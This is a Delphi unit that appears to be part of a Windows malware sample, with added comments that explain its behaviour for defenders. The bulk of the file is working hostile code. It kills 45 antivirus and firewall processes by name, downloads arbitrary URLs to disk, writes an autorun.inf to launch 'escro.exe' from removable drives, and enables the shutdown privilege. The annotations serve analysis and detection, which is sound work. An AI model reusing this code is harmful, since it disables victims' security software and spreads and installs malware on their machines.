📄 fun2.pas
unit fun2;
interface
uses
windows, messages, URLMon, WinSock, Sysutils, Classes, Tlhelp32, IniFiles;
const
// Process image names that KillVir looks up (via FindProcess) and terminates.
// Most entries appear to be antivirus / personal-firewall components; the list
// also holds the Windows command-line tools sc.exe and net.exe (and the
// sc1/net1 variants). NOTE(review): vendor attribution of individual names is
// inferred from the names only - confirm before using them as signatures.
// Defender note: a process that opens any of these images with
// PROCESS_TERMINATE is worth alerting on; the list itself is a usable
// indicator set for this sample.
VirS : array[0..44] of string =
('sc.exe', 'net.exe', 'sc1.exe', 'net1.exe', 'PFW.exe',
'Kav.exe', 'KVOL.exe', 'KVFW.exe', 'TBMon.exe', 'kav32.exe',
'kvwsc.exe', 'CCAPP.exe', 'EGHOST.exe', 'KRegEx.exe', 'kavsvc.exe', 'VPTray.exe',
'RAVMON.exe', 'KavPFW.exe', 'SHSTAT.exe', 'RavTask.exe', 'TrojDie.kxp', 'Iparmor.exe',
'MAILMON.exe', 'MCAGENT.exe', 'KAVPLUS.exe', 'RavMonD.exe', 'Rtvscan.exe', 'Nvsvc32.exe',
'KVMonXP.exe', 'Kvsrvxp.exe', 'CCenter.exe', 'KpopMon.exe', 'RfwMain.exe', 'KWATCHUI.exe',
'MCVSESCN.exe', 'MSKAGENT.exe', 'kvolself.exe', 'KVCenter.kxp', 'kavstart.exe', 'RAVTIMER.exe',
'RRfwMain.exe', 'FireTray.exe', 'UpdaterUI.exe', 'KVSrvXp_1.exe', 'RavService.exe');
function HostToIP(Name: string; var Ip: string): Boolean; // resolve a host name to an IPv4 string
function GetWinVersion: string; // describe the running Windows version
function GetFSize(PathName: string): Integer; // size of a file in bytes
function GetTmpPath: string; // path of the temporary folder
function GetSysPath: string; // path of the Windows system folder
function GetUserName: string; // named "user name", but the implementation calls GetComputerName
procedure AdjustToken(); // enable the shutdown privilege on the current process token
function Dlf(SourceFile, DestFile: string): Boolean; // download a URL to a local file
procedure Writeinf(fn: string); // write an INF file with an [Autorun] section
function FindProcess(ExeName: string): Longword; // find a process by image name, return its PID (0 if none)
procedure KillVir; // terminate the processes listed in VirS (original comment: "shut down antivirus software")
implementation
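{ Resolves a host name to a dotted-quad IPv4 string.

  Name - host name (or literal IPv4 address) to resolve.
  Ip   - receives 'a.b.c.d' for the first address returned; left untouched
         when the function returns False.
  Returns True when an IPv4 address was obtained.

  Changes from the original:
  - Name is handed to gethostbyname directly. The original copied it with
    StrPCopy into a fixed 256-character stack buffer, which overflowed for
    any Name longer than 255 characters.
  - The gethostname call was removed: its output was overwritten immediately.
  - WSAStartup is checked, and WSACleanup only runs after a successful start.
  - The address family and length are verified before four bytes are read. }
function HostToIP(Name: string; var Ip: string): Boolean;
var
  wsdata  : TWSAData;
  hostEnt : PHostEnt;
  addr    : PChar;
begin
  Result := False;
  // A failed WSAStartup must not be paired with WSACleanup.
  if WSAStartup($0101, wsdata) <> 0 then
    Exit;
  try
    hostEnt := gethostbyname(PChar(Name));
    if not Assigned(hostEnt) then
      Exit;
    // Only an IPv4 entry guarantees four readable address bytes.
    if (hostEnt^.h_addrtype <> AF_INET) or (hostEnt^.h_length < 4) then
      Exit;
    if not Assigned(hostEnt^.h_addr_list) then
      Exit;
    addr := hostEnt^.h_addr_list^;
    if not Assigned(addr) then
      Exit;
    Ip := Format('%d.%d.%d.%d', [Byte(addr[0]),
      Byte(addr[1]), Byte(addr[2]), Byte(addr[3])]);
    Result := True;
  finally
    WSACleanup;
  end;
end;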
{ Returns a two-line description of the running Windows version:
  '<platform> Version <major>.<minor>' CR LF ' (Build <build>: <CSD string>)'.
  The platform part is empty when dwPlatformId is none of the three known
  values. Returns '' when GetVersionEx fails.
  NOTE(review): GetVersionEx is deprecated and may not report the true
  version on newer Windows releases - confirm before relying on the value. }
function GetWinVersion: string;
var
  Info         : TOSVersionInfo;
  PlatformName : string;
begin
  Result := '';
  // The API requires the record size to be filled in by the caller.
  Info.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not windows.GetVersionEx(Info) then
    Exit;

  if Info.dwPlatformId = VER_PLATFORM_WIN32s then
    PlatformName := 'Win32s'
  else if Info.dwPlatformId = VER_PLATFORM_WIN32_WINDOWS then
    PlatformName := 'Windows 95'
  else if Info.dwPlatformId = VER_PLATFORM_WIN32_NT then
    PlatformName := 'Windows NT';

  Result := PlatformName + ' Version ' + IntToStr(Info.dwMajorVersion) +
    '.' + IntToStr(Info.dwMinorVersion) + #13#10' (Build ' +
    IntToStr(Info.dwBuildNumber)
    + ': ' + Info.szCSDVersion + ')';
end;
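{ Returns the size in bytes of the file at PathName.

  The file is opened read-only without denying other readers or writers.
  TFileStream.Create raises an exception when the file cannot be opened;
  that exception propagates to the caller, as in the original.

  Fix: the stream is now released in a finally block, so the file handle is
  not leaked if reading the size raises.
  NOTE(review): the Integer result cannot represent files of 2 GiB or more. }
function GetFSize(PathName: string): Integer;
var
  f : TFileStream;
begin
  f := TFileStream.Create(PathName, fmOpenRead or fmShareDenyNone);
  try
    Result := f.Size;
  finally
    f.Free;
  end;
end;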
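{ Returns the Windows system directory, or '' when it cannot be obtained.

  Fix: the original ignored the result of GetSystemDirectory and converted
  the buffer regardless, so a failed or truncated call returned whatever
  happened to be on the stack. The buffer is now MAX_PATH characters plus
  the terminator, and the returned length is validated before use. }
function GetSysPath: string;
var
  sysdir : array[0..MAX_PATH] of char;
  len    : UINT;
begin
  len := GetSystemDirectory(sysdir, Length(sysdir));
  // 0 means failure; a value >= the buffer size is the size that would be needed.
  if (len = 0) or (len >= UINT(Length(sysdir))) then
    Result := ''
  else
    SetString(Result, PChar(@sysdir[0]), len);
end;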
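{ Returns the temporary-files directory reported by GetTempPath, or '' when
  it cannot be obtained.

  Fix: the original ignored the result of GetTempPath and converted the
  buffer regardless, so a failed or truncated call returned uninitialised
  stack contents. The returned length is now validated before use. }
function GetTmpPath: string;
var
  tmpdir : array[0..MAX_PATH] of char;
  len    : DWORD;
begin
  len := GetTempPath(Length(tmpdir), @tmpdir[0]);
  // 0 means failure; a value >= the buffer size is the size that would be needed.
  if (len = 0) or (len >= DWORD(Length(tmpdir))) then
    Result := ''
  else
    SetString(Result, PChar(@tmpdir[0]), len);
end;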
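{ Returns the local COMPUTER name, or '' when it cannot be obtained.

  Despite its name, this function has always called GetComputerName, not the
  Windows GetUserName API; that behaviour is kept so existing callers see the
  same value. Within this unit the identifier also hides Windows.GetUserName.

  Fix: the original ignored the result of GetComputerName and converted the
  buffer regardless, returning uninitialised stack contents on failure. }
function GetUserName: string;
var
  buffer : array[0..MAX_COMPUTERNAME_LENGTH + 1] of char;
  Size   : Cardinal;
begin
  Size := MAX_COMPUTERNAME_LENGTH + 1;
  // On success Size holds the number of characters copied, without the terminator.
  if GetComputerName(@buffer[0], Size) then
    SetString(Result, PChar(@buffer[0]), Size)
  else
    Result := '';
end; { GetUserName }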
procedure AdjustToken();
{ Enables SeShutdownPrivilege in the access token of the current process.
  NOTE(review): the results of OpenProcessToken, LookupPrivilegeValue and
  AdjustTokenPrivileges are all ignored, so the caller cannot tell whether
  the privilege was actually enabled. The token handle opened here is never
  closed in this procedure.
  Defender note: privilege adjustment on the process's own token is visible
  to token-right auditing where that is enabled. }
var
hdlProcessHandle : Cardinal;
hdlTokenHandle : Cardinal;
tmpLuid : Int64;
//tkpPrivilegeCount: int64;
tkp : TOKEN_PRIVILEGES;
tkpNewButIgnored : TOKEN_PRIVILEGES; // receives the previous state; never read
lBufferNeeded : Cardinal;
Privilege : array[0..0] of _LUID_AND_ATTRIBUTES;
begin
// Pseudo-handle for this process; used only to open its token.
hdlProcessHandle := GetCurrentProcess;
OpenProcessToken(hdlProcessHandle, (TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY),
hdlTokenHandle);
// Get the LUID for shutdown privilege.
LookupPrivilegeValue('', 'SeShutdownPrivilege', tmpLuid);
Privilege[0].Luid := tmpLuid;
Privilege[0].Attributes := SE_PRIVILEGE_ENABLED;
tkp.PrivilegeCount := 1; // One privilege to set
tkp.Privileges[0] := Privilege[0];
// Enable the shutdown privilege in the access token of this
// process.
AdjustTokenPrivileges(hdlTokenHandle,
false,
tkp,
SizeOf(tkpNewButIgnored),
tkpNewButIgnored,
lBufferNeeded);
end;
function Dlf(SourceFile, DestFile: string): Boolean;
{ Downloads the URL in SourceFile to the local path DestFile using
  UrlDownloadToFile. Returns True only when the API returns 0; any exception
  is swallowed and reported as False.
  NOTE(review): neither the URL nor the destination path is validated here,
  and nothing in this function verifies the downloaded content (no hash or
  signature check), so whatever the server returns is written to DestFile.
  Defender note: this call pattern is typical of a downloader stage; outbound
  fetches followed by a new executable on disk are the observable events. }
begin
try
Result := UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil)
= 0;
except
Result := false;
end;
end;
{ Writes an [Autorun] section to the INI-format file fn, pointing the open,
  shellexecute and shell\1\command entries at 'escro.exe'.
  NOTE(review): these are the keys of an autorun.inf file; presumably fn is
  the root of a drive so that escro.exe is launched when the volume is
  opened - confirm against the caller.
  Defender note: the indicators are an autorun.inf naming escro.exe at a
  volume root; disabling AutoRun (NoDriveTypeAutoRun policy) prevents the
  file from being honoured. }
procedure Writeinf(fn: string);
var
MyReg : TiniFile;
begin
Myreg:= TiniFile.Create(fn);
try
MyReg.WriteString('Autorun','open','escro.exe');
MyReg.WriteString('Autorun','shellexecute','escro.exe');
// Adds a context-menu verb labelled "Open" that runs the same executable.
MyReg.WriteString('Autorun','shell\1','Open');
MyReg.WriteString('Autorun','shell\1\command','escro.exe');
finally
MyReg.Free;
end;
end;
procedure KillVir; // original comment: "shut down antivirus software"
{ For each of the 45 image names in VirS, looks up a running process with
  FindProcess and, when one is found, opens it with PROCESS_TERMINATE and
  calls TerminateProcess with exit code $FFFFFFFF.
  NOTE(review): FindProcess returns only the first match, so at most one
  process per name is targeted per call. The OpenProcess result is not
  checked and the handle is never closed.
  Defender note: this is a defence-evasion routine. Process-access events
  where a non-security process requests PROCESS_TERMINATE on a security
  product, and an exit code of $FFFFFFFF on those products, are the
  detection points; protected-process / tamper-protection features are the
  mitigation. }
var
P : Longword;
i : Integer;
begin
for i := 0 to 44 do
begin
P := FindProcess(VirS[i]);
if P <> 0 then
TerminateProcess(OpenProcess(PROCESS_TERMINATE, False, P), $FFFFFFFF);
end;
end;
function FindProcess(ExeName: string): Longword; // find the given process and return its PID
{ Walks a Toolhelp process snapshot and returns the PID of the first process
  whose image name ENDS with ExeName (case-insensitive), or 0 when there is
  no match.
  NOTE(review): because the comparison is a suffix match, a short name also
  matches any longer image name with the same ending (for example 'sc.exe'
  matches 'kvwsc.exe'). The snapshot handle is not checked for failure
  before it is used. }
{ (nested helper) True when AText ends with ASubText, ignoring case }
function AnsiEndsText(const ASubText, AText: string): Boolean;
var
P : PChar;
L, L2 : Integer;
begin
P := PChar(AText);
L := Length(ASubText);
L2 := Length(AText);
// P is moved to where the suffix would start; when L > L2 it points before
// the string, but the check below returns before it is dereferenced.
Inc(P, L2 - L);
if L > L2 then
Result := False
else
// CompareString returns 2 when the two ranges compare equal.
Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, P, L, PChar(ASubText), L) = 2;
end;
var
sphandle : DWORD;
Found : BOOL;
PStruct : TProcessEntry32;
begin
Result := 0;
// $00000002 is the snapshot flag for the process list.
sphandle := CreateToolhelp32Snapshot($00000002, 0);
// dwSize must be set before the first Process32First call.
PStruct.dwSize := SizeOf(PStruct);
Found := Process32First(sphandle, PStruct);
while Found do
begin
if AnsiEndsText(ExeName, PStruct.szExeFile) then
begin
Result := PStruct.th32ProcessID;
Break;
end;
Found := Process32Next(sphandle, PStruct);
end;
CloseHandle(sphandle);
end;
end.